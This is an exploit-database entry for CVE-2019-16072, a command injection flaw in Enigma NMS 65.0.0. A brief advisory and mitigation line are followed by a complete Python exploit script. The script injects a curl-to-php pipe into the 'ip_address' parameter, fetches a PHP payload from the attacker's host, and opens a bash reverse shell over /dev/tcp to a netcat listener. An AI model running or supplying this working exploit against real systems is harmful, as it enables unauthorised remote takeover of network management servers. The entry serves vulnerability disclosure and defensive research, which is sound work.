header-logo
Suggest Exploit
vendor:
Enigma NMS
by:
Mark Cross
9.8
CVSS
CRITICAL
OS Command Injection
78
CWE
Product Name: Enigma NMS
Affected Version From: Enigma NMS 65.0.0
Affected Version To: Enigma NMS 65.0.0
Patch Exists: YES
Related CWE: CVE-2019-16072
CPE: a:netsas:enigma_nms
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2019

Enigma NMS OS Command Injection

NETSAS Pty Ltd Enigma NMS is vulnerable to OS Command Injection. An attacker can exploit this vulnerability to execute arbitrary commands on the vulnerable system. This vulnerability exists due to insufficient sanitization of user-supplied input in the 'ip_address' parameter of the 'discover_and_manage.cgi' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability can result in arbitrary code execution on the vulnerable system.

Mitigation:

Ensure that user-supplied input is properly sanitized before being used in the application.
Source

Exploit-DB raw data:

#!/usr/bin/python
#--------------------------------------------------------------------#
# Exploit Title: Enigma NMS OS Command Injection                     #
# NETSAS Pty Ltd Enigma NMS                                          #
# Date:  21 July 2019                                                #
# Author: Mark Cross (@xerubus | mogozobo.com)                       #
# Vendor: NETSAS Pty Ltd                                             #
# Vendor Homepage:  https://www.netsas.com.au/                       #
# Software Link: https://www.netsas.com.au/enigma-nms-introduction/  #
# Version: Enigma NMS 65.0.0                                         #
# CVE-IDs: CVE-2019-16072                                            #
# Full write-up: https://www.mogozobo.com/?p=3647                    #
#--------------------------------------------------------------------#

import sys, time, os, subprocess, signal, requests, socket, SocketServer, SimpleHTTPServer, threading

os.system('clear')

print("""\
        _  _
  ___ (~ )( ~)
 /   \_\ \/ /   
|   D_ ]\ \/  -= Enigma NMS Reverse Shell by @xerubus =-    
|   D _]/\ \     -= We all have something to hide =-
 \___/ / /\ \\
      (_ )( _)
      @Xerubus    
                    """)

enigma_host = raw_input("Enter Enigma NMS IP address:\t")
attack_host = raw_input("Enter Attacker IP address:\t")
rev_sh_port = raw_input("Enter reverse shell port:\t")
web_svr_port = raw_input("Enter web server port:\t\t")
user = raw_input("Enter Username:\t\t\t")
os.system("stty -echo")
password = raw_input("Enter Password (no echo):\t")
os.system("stty echo")
	
enigma_url = "http://" + enigma_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser&hst_id=none&snmpv3_profile_id=&ip_address=|curl%20" + attack_host + ":" + web_svr_port + "/evil.php|php&snmp_ro_string=public&mib_oid=system&mib_oid_manual=.1.3.6.1.2.1.1&snmp_version=1"
enigma_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + attack_host + "/cgi-bin/protected/discover_and_manage.cgi?action=snmp_browser", "Connection": "close", "Upgrade-Insecure-Requests": "1"}

print "\n\n[+] Building PHP reverse shell"
f=open("evil.php","w")
f.write("<?php\nexec(\"/bin/bash -c \'bash -i >& /dev/tcp/" + attack_host + "/" + rev_sh_port + " 0>&1\'\");\n?>\n")
f.close()

# Create simple webserver hosting evil php file
print "[+] Hosting PHP reverse shell"
web_svr_port = str(web_svr_port)
web_svr = subprocess.Popen(["python", "-m", "SimpleHTTPServer", web_svr_port], stdout=subprocess.PIPE, shell=False, preexec_fn=os.setsid)

# Create netcat listener
print "[+] Creating listener on port " + rev_sh_port
subprocess.Popen(["nc", "-nvlp", rev_sh_port])

# Send payload to Enigma NMS
print "[+] Sending payload\n"
try:
    r = requests.get(enigma_url, headers=enigma_headers, auth=(user, password))
except:
    pass

print "\n[+] Cleaning up mess..." 

# Shut down http server
os.killpg(os.getpgid(web_svr.pid), signal.SIGTERM)

Navigation

Suggest Exploit

Services By CQR